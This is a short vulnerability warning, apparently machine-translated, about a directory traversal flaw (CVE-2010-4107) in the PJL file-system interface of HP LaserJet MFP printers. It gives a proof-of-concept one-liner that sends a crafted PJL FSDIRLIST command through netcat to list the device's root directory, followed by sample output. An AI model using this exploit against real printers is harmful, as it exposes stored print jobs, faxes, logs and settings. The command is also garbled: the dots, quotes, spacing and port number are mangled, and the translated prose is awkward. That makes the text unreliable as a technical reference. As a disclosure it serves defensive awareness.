HP LaserJet printer PJL interface directory traversal vulnerability-vulnerability warning-the black bar safety net

HP LaserJet is HP printer, comprising a plurality of models. HP LaserJet to the MFP device in the PJL file system access interface there is a directory traversal vulnerability that could lead to sensitive information disclosure and is likely to be modified. This includes the background processing of the print job, received Fax, the log file or device other settings.

[+]info:

HP LaserJet Directory Traversal in PJL Interface 
Vendor: Hewlett-Packard, http://www.hp.com 
Affected Products: Various HP LaserJet MFP devices 
(See HP advisory [3] for the complete list) 
Vulnerability: Directory Traversal in PJL interface 
Risk: HIGH 
[+]poc: 

The following command can be used to reproduce the problem. It lists
all files in the root directoy of the device:

$ python-c ‘print “\x1b%-12345X () PJL FSDIRLIST NAME="0:\\…\\…\\…\\" \
ENTRY=1 COUNT=9 9 9 9 9 9\x0d\x0a\x1b%-12345X\x0d\x0a”’ | nc 192.168.0.1 9 1 0 0
@PJL FSDIRLIST NAME="0:\…\…\…" ENTRY=1
. TYPE=DIR
… TYPE=DIR
tmp TYPE=DIR
etc TYPE=DIR
xps TYPE=DIR
dsk_ide2a TYPE=DIR
dsk_ColorIQ TYPE=DIR
dsk_CustomIQ TYPE=DIR
bootdev TYPE=DIR
dsk_jdi TYPE=DIR
dsk_jdi_ss TYPE=DIR
dsk_af TYPE=DIR
lrt TYPE=DIR
webServer TYPE=DIR

[+]Reference:

[1] 
http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pdf 
[2] 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4107 
[3] 
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02004333